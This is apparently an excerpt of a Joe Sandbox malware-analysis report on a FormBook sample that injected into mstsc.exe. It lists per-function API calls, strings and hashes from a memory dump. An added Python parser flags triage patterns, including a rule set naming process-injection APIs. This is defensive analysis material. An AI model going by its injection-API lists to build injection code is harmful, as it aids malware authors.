• LocalFree.KERNEL32(00000000,?,?,?,00000004,?,?,?,?,?,?), ref: 0095A54F
• LocalFree.KERNEL32(?,?,?,?,00000004,?,?,?,?,?,?), ref: 0095A55D
• LocalFree.KERNEL32(00000000,?,?,?,00000004,?,?,?,?,?,?), ref: 0095A568
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Local$Free$Alloc$MessageTrace$AddressAuthenticationBufferCredErrorHandleLastLibraryModulePackProc
• String ID: CreateSPN failed$PWSTR$StringCchLength failed$TERMSRV
• API String ID: 129126779-209314103
• Opcode ID: eed136bb05c5347c958c194cdcdc2f1129a2931dda39379e9cd1f82467dc6c75
• Instruction ID: da7c4577ba002bf78d4b4a4b1d5a607d12b17d53b5ce0dfb99f2aaea2fcdfedc
• Opcode Fuzzy Hash: eed136bb05c5347c958c194cdcdc2f1129a2931dda39379e9cd1f82467dc6c75
• Instruction Fuzzy Hash: 51C1F071A04305AFCB29CF96D849F6D3BA9AB49305F14415DFD00AB2A1C7B4CD85EF4A
APIs
• memset.MSVCRT ref: 009599F0
• CredGetSessionTypes.ADVAPI32(00000007,?), ref: 00959A7C
• GetLastError.KERNEL32 ref: 00959AA4
• GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00959AC7
• CredWriteW.ADVAPI32(00000000,00000000,?,?,?,00000004,?,?,?,?,?), ref: 00959C52
• GetLastError.KERNEL32(?,?,00000004,?,?,?,?,?), ref: 00959C5C
• CredWriteW.ADVAPI32(00000000,00000000,?,?,00000004,?,?,?,?,?), ref: 00959C88
• GetLastError.KERNEL32(?,?,00000004,?,?,?,?,?), ref: 00959C96
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
• LocalFree.KERNEL32(00000000), ref: 00959D95
• LocalFree.KERNEL32(00000000), ref: 00959DA0
• LocalFree.KERNEL32(?), ref: 00959DBA
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorFreeLast$CredLocal$MessageTraceWrite$AddressHandleLibraryModuleProcSessionTypesmemset
• String ID: CredWrite failed$PrepareForCredWriteNew failed$PrepareForCredWriteOld failed$TERMSRV
• API String ID: 1352401320-3796034688
• Opcode ID: 4f3e52038290753b3a8b0636cf84787ee37fe6df91546e4f784f868fde488fcf
• Instruction ID: 6c2010cf89757cc6029270b4c8f4f66e1b75a3632a065622b0e2942b4f09a19e
• Opcode Fuzzy Hash: 4f3e52038290753b3a8b0636cf84787ee37fe6df91546e4f784f868fde488fcf
• Instruction Fuzzy Hash: EFC1A072A04318EFEB25DF96D844FAA7BB9AB49311F040059FD01AB2A2D771DC44DFA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000), ref: 009348D3
                                                                                                                                                                                    • GetDlgItem.USER32(00000005,00906780), ref: 00934913
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00934916
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0093493B
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0093493E
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0093494D
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00934950
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0093496F
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000032FF), ref: 009349A0
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009349B6
                                                                                                                                                                                    • CreateDialogIndirectParamW.USER32(?,00000000,00000000,00961E40,?), ref: 009349FA
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00934A09
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000032FA), ref: 00934A1D
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00934A2E
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00934A43
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000032FA), ref: 00934A51
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000141,000000FF,00000000), ref: 00922B0E
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 00922B22
                                                                                                                                                                                      • Part of subcall function 00922AD9: wcsncmp.MSVCRT ref: 00922B40
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 00922B67
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00922BB9
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00922BC8
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,0000040E,00000000,00000001), ref: 00922BD3
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 00922BDD
                                                                                                                                                                                      • Part of subcall function 009347DA: GetDlgItem.USER32(?,000032FA), ref: 009347EA
                                                                                                                                                                                      • Part of subcall function 009347DA: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 009347FA
                                                                                                                                                                                      • Part of subcall function 009347DA: #412.COMCTL32(00000000,Function_00034790,00000000), ref: 00934813
                                                                                                                                                                                      • Part of subcall function 009347DA: #410.COMCTL32(00000000,Function_00034790,00000000,00000000), ref: 00934858
                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,000032FA,-00000054), ref: 00934A72
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSendWindow$Enable$Show$#410#412??2@CreateDialogIndirectParamRectTextwcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1121832012-0
                                                                                                                                                                                    • Opcode ID: bfc211dbd6d5ef92ac8a850234efc045ca5053cb9f3d02a62b8e2246f6560f9b
                                                                                                                                                                                    • Instruction ID: 5a4223fc88884e8bd5364c5978e01b50666333258b6854c453aa81004af1261e
                                                                                                                                                                                    • Opcode Fuzzy Hash: bfc211dbd6d5ef92ac8a850234efc045ca5053cb9f3d02a62b8e2246f6560f9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8518B71910214AFCF11DFA5DC89EAB7BB9FF48700F054069F905AB265CB75A811DFA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00000000,00000000,00945DAF,00000000,?,00000000,?,0094672F,00000000,00000000,?,00000001,?,00000000,00000000,0096AF68), ref: 0090FAA7
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0090FB8A
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@AddressCommandFreeHandleLibraryLineMessageModuleProcTrace
                                                                                                                                                                                    • String ID: CAtlExeModuleT::PreMessageLoop failed!$CTscRemoteSessionsManager$Embedding$Failed to to intialize remote sessions manager$RegServer$RegisterAppId failed!$RegisterServer failed!$SingleUse$UnregServer$UnregisterAppId failed!$UnregisterServer failed!$m_RemoteSessionLock.Init failed!
                                                                                                                                                                                    • API String ID: 2806423288-809283771
                                                                                                                                                                                    • Opcode ID: a30bcc2dfd068df6d2ccafd8490601c6cdc98f0781db358d5b6e0c4f3d026c41
                                                                                                                                                                                    • Instruction ID: 7776ecf67a1458d96575de5e1ceed337bade153f5fd4ba26939f7551a6dbc635
                                                                                                                                                                                    • Opcode Fuzzy Hash: a30bcc2dfd068df6d2ccafd8490601c6cdc98f0781db358d5b6e0c4f3d026c41
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9A14C31B183556FDB3ADF64D835F653AD5AB85350F0500A8F805ABAF2C7A4CE80AF46
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?,?,?,?,00000000), ref: 00940251
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000335E,?,?,?,?,00000000), ref: 00940267
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000335E), ref: 00940271
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000CF,00000001,00000000), ref: 0094028B
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00940296
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 009402A6
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003366), ref: 009402D5
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009402EC
                                                                                                                                                                                    • CreateDialogIndirectParamW.USER32(?,00000000,?,00961E40,?), ref: 0094032A
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00940336
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000335E), ref: 00940344
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00940356
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemWindow$MessageRectText$??2@AddressCreateDialogFreeHandleIndirectInvalidateLibraryModuleParamProcSendShowTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2286261651-0
                                                                                                                                                                                    • Opcode ID: 040496d88880aacef31ecf12cf55eabf43c7d74f6b51afb0d69e2d660e7ee16c
                                                                                                                                                                                    • Instruction ID: 4a25e9d484104cee451f95fc0f5f1ed957ab1abd16e50e9b3ac021c1d0c046ba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 040496d88880aacef31ecf12cf55eabf43c7d74f6b51afb0d69e2d660e7ee16c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12518F71604200EFDF11AFA5DD99E7A7F7AEF89700B148059FD469B266CBB1D800DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00916B91
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00916B9C
                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00916BAE
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • SetRect.USER32 ref: 00916BC2
                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?,00000001), ref: 00916C2C
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00917015
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HandleContainerWndDisplayChange, xrefs: 00916E62
                                                                                                                                                                                    • QI for IID_IMsRdpClient9 failed!, xrefs: 00916E2D
                                                                                                                                                                                    • EnterMoveSizeLoop, xrefs: 00916E69
                                                                                                                                                                                    • Failed RegisterPopupParentWindowClass(TRUE), xrefs: 00916BFB
                                                                                                                                                                                    • DynamicDeviceTestEnabled, xrefs: 00916EFE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: RectWindow$CommonControlsCopyDesktopDestroyInitMessageTrace
                                                                                                                                                                                    • String ID: DynamicDeviceTestEnabled$EnterMoveSizeLoop$Failed RegisterPopupParentWindowClass(TRUE)$HandleContainerWndDisplayChange$QI for IID_IMsRdpClient9 failed!
                                                                                                                                                                                    • API String ID: 2476843831-3953550343
                                                                                                                                                                                    • Opcode ID: d3e39d0bda8ebdf0fec8dc0090cc86e183f0cc0dc435b5295c41cb0a7e891929
                                                                                                                                                                                    • Instruction ID: 54797416545bee8b5cb72125d43c7f8a04265f574776bcb65b172e466ffb9846
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3e39d0bda8ebdf0fec8dc0090cc86e183f0cc0dc435b5295c41cb0a7e891929
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E1BE31B04309AFDB19DF65D899FE9BBAABB48304F044058F5419B2A2CBB1E8D1DF51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400,750A375A,?,?), ref: 009372FA
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000200), ref: 00937396
                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,00906D74), ref: 0093763C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressErrorFreeHandleLastLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: TCHAR
                                                                                                                                                                                    • API String ID: 3225508460-2426338081
                                                                                                                                                                                    • Opcode ID: d08157ec1494f28061426cf812aa4d212064bb7898ba4b440bbc2bb48e400062
                                                                                                                                                                                    • Instruction ID: 3fa8931bb58380da700227c60052d8756462d5e6cae65bb4d584f3e2138cc95d
                                                                                                                                                                                    • Opcode Fuzzy Hash: d08157ec1494f28061426cf812aa4d212064bb7898ba4b440bbc2bb48e400062
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF91E6B1A0C3086FDB399F94DC5AFA6B7AAAB49304F100098F541A71B2C7B4DD80DF56
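The blocks in this part of the report are the Joe Sandbox IDA Plugin's per-function summaries for the memory dump at 00900000 in the mstsc.exe process (process 10): the APIs the function calls directly, calls made from its subroutines ("Part of subcall function ..."), the strings it references, and fuzzy hashes of its bytes. Reading hundreds of these by hand is slow, so the following is an added example (not part of the report and not Joe Sandbox tooling) of a small Python parser that turns blocks in this layout into structured records and applies a few triage rules, such as flagging a function that resolves Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection through GetProcAddress and then calls CreateProcessW, as the block that follows this one does. The sample text is constructed from lines in this section with some argument lists shortened; the rule set, the record field names and the "Download File" suffix handling are this example's own assumptions, not Joe Sandbox fields. One caveat for anyone running rules like this over the listing: the dump is mapped "based on PE: true" and its strings (CTscRemoteSessionsManager, IID_IMsRdpClient9, CAtlExeModuleT) belong to the Remote Desktop client itself, and the report's signatures say the sample uses process hollowing, so a flagged function here is most likely the host process's own code rather than the injected FormBook payload; treat the output as a pointer for manual review, not a verdict.

```python
import re

# Constructed sample: two function blocks in the layout the Joe Sandbox IDA Plugin
# listing uses (bullets, "ref:" on API lines, "xrefs:" on string lines). The lines
# are copied from this report section, with long argument lists shortened.
SAMPLE = """\
APIs
• GetDesktopWindow.USER32 ref: 00916B91
• GetWindowRect.USER32(00000000,?), ref: 00916B9C
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B), ref: 009110C8
• InitCommonControlsEx.COMCTL32(?,00000001), ref: 00916C2C
Strings
• QI for IID_IMsRdpClient9 failed!, xrefs: 00916E2D
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
Similarity
• Instruction Fuzzy Hash: 76E1BE31B04309AFDB19DF65D899FE9BBAABB48304F044058F5419B2A2CBB1E8D1DF51
APIs
• LoadLibraryW.KERNEL32(kernel32.dll,00000000,00000000,00000000), ref: 009459A8
• GetLastError.KERNEL32 ref: 009459B5
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00945A1D
• GetProcAddress.KERNEL32(00945C84,Wow64RevertWow64FsRedirection), ref: 00945A2C
• memset.MSVCRT ref: 00945A4A
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 00945A84
• FreeLibrary.KERNEL32(00945C84), ref: 00945BA3
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
Strings
• Wow64DisableWow64FsRedirection, xrefs: 00945A17
"""

# Section headings as they appear in the listing; a new function block starts at "APIs".
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed by
# "Part of subcall function ADDR:". Names may be C++ decorated ("??2@YAPAXI@Z") or
# ordinals ("#412"), so anything up to the first '.' is accepted as the name.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
STR_RE = re.compile(r"^(?P<text>.*),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]+)$")


def parse_blocks(report_text):
    """Split a listing into function blocks: dicts with 'apis', 'strings' and 'meta'."""
    blocks, block, section = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                block = {"apis": [], "strings": [], "meta": {}}
                blocks.append(block)
            section = line
            continue
        if block is None:
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                block["apis"].append({"name": m["name"], "module": m["module"].upper(),
                                      "args": args, "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings":
            m = STR_RE.match(item)
            if m:
                block["strings"].append((m["text"], m["ref"]))
        elif ": " in item:
            key, value = item.split(": ", 1)
            # "Download File" is the report page's link text, not part of the dump name.
            block["meta"][key] = value.removesuffix("Download File").strip()
    return blocks


def resolved_imports(block):
    """Names the function itself passes to GetProcAddress (subcall lines excluded)."""
    return {a["args"][1] for a in block["apis"]
            if a["name"] == "GetProcAddress" and a["subcall"] is None and len(a["args"]) == 2}


def triage(block):
    """Behavioural notes for one block, derived only from its direct API calls."""
    direct = {a["name"] for a in block["apis"] if a["subcall"] is None}
    notes, resolved = [], resolved_imports(block)
    if resolved:
        notes.append("resolves imports at run time: " + ", ".join(sorted(resolved)))
    wow64 = {n for n in resolved if n.startswith("Wow64") and n.endswith("FsRedirection")}
    if wow64 and {"CreateProcessW", "CreateProcessA"} & direct:
        notes.append("spawns a process with WOW64 file-system redirection toggled "
                     "(32-bit code reaching the native System32)")
    if {"WriteProcessMemory", "SetThreadContext", "QueueUserAPC", "NtUnmapViewOfSection"} & direct:
        notes.append("process-injection primitives present")
    return notes


if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE)):
        print(i, b["meta"].get("Instruction Fuzzy Hash", "")[:16], triage(b) or "nothing flagged")
```

The parser keeps subcall lines separate from the function's own calls on purpose: the same TraceMessage and GetProcAddress(EventActivityIdControl) subcall lines are repeated under almost every block in this listing, so counting them as direct calls would flag nearly every function. The "Instruction Fuzzy Hash" and "Opcode ID" values land in `meta`, which is what you would key on to find the same function in a dump from another sample.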
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,00000000,00000000,00000000), ref: 009459A8
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009459B5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00945A1D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00945C84,Wow64RevertWow64FsRedirection), ref: 00945A2C
                                                                                                                                                                                    • memset.MSVCRT ref: 00945A4A
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 00945A84
• GetLastError.KERNEL32 ref: 00945A93
• CloseHandle.KERNEL32(?), ref: 00945AE9
• CloseHandle.KERNEL32(?), ref: 00945AEE
• FreeLibrary.KERNEL32(00945C84), ref: 00945BA3
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Strings
• kernel32.dll, xrefs: 0094599B
• Wow64DisableWow64FsRedirection, xrefs: 00945A17
• Wow64RevertWow64FsRedirection, xrefs: 00945A1F
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressHandleLibraryProc$CloseErrorFreeLast$CreateLoadModuleProcessmemset
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 3803272689-4169039593
• Opcode ID: 9e9fdf9095cce343fdcb9017e98b28aa1190d7a1a225fb9ee5f6529695f79831
• Instruction ID: b7e12b34c7f317fc2bad05c12b6521bfd5a8e1baab4432e3337d91b7ad694230
• Opcode Fuzzy Hash: 9e9fdf9095cce343fdcb9017e98b28aa1190d7a1a225fb9ee5f6529695f79831
• Instruction Fuzzy Hash: B351E672A047087FDB259FE4DC89FAA7BA9EB48314F150159F601A71A3C6B1DC80EF51
APIs
• GetDlgItem.USER32(?,00003313), ref: 00937895
• SendMessageW.USER32(00000000), ref: 0093789C
• IsDlgButtonChecked.USER32(?,000033A6), ref: 009378B6
• IsDlgButtonChecked.USER32(?,00003316), ref: 009378D7
  • Part of subcall function 00961C30: GetDlgItem.USER32(?,0096A070), ref: 00961C4E
  • Part of subcall function 00961C30: EnableWindow.USER32(00000000), ref: 00961C55
• SetWindowPos.USER32(?,00000000,?,00000110,?,00000110,00000000), ref: 00937BA2
• GetDlgItem.USER32(?,0000331B), ref: 00937BC4
• EnableWindow.USER32(00000000), ref: 00937BCB
• CheckDlgButton.USER32(?,000033A6,00000000), ref: 00937C0B
• CheckDlgButton.USER32(?,00003316,00000000), ref: 00937C52
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Button$ItemWindow$CheckCheckedEnable$MessageSend
• String ID:
• API String ID: 2189916300-0
• Opcode ID: e67916e8476f1852f91d929180a12a6a4261996d26c5ae4a88ab4e3459a4ea94
• Instruction ID: 5c5e11cdd3baa55a91f1a785a10cc039b58dd956fd9f824036527df8a8f7570b
• Opcode Fuzzy Hash: e67916e8476f1852f91d929180a12a6a4261996d26c5ae4a88ab4e3459a4ea94
• Instruction Fuzzy Hash: 33C1BFB1218345AFD725DFA4C889E6AB7A9BF89304F04046CF541DB2A2CB74ED50EF51
APIs
• GetClientRect.USER32(?,?,?,00000000,?), ref: 0095E3E1
• GetLastError.KERNEL32(?,00000000,?), ref: 0095E3EB
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressClientErrorFreeHandleLastLibraryMessageModuleProcRectTrace
• String ID: (
• API String ID: 3483488408-3887548279
• Opcode ID: c3cfc8f90771cc4518a40526c5e9233d93ae1191d8aec2ff88bc8fa6db50a761
• Instruction ID: 541c962ba950b360d87b223a8cb59afc8d65c227ed8573ce6221e2f93e36332b
• Opcode Fuzzy Hash: c3cfc8f90771cc4518a40526c5e9233d93ae1191d8aec2ff88bc8fa6db50a761
• Instruction Fuzzy Hash: 30A1BF72619300AFD729CF69C889F2A7BEABB88391F04095DF98097261C772DD44DF42
APIs
• GetLastError.KERNEL32(00000000,00000000,00000038), ref: 00921BDC
• LoadCursorW.USER32 ref: 00921C06
• GetStockObject.GDI32(00000005), ref: 00921C11
• RegisterClassExW.USER32(00000030), ref: 00921C2D
• GetLastError.KERNEL32 ref: 00921C3A
• GetLastError.KERNEL32 ref: 00921C67
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
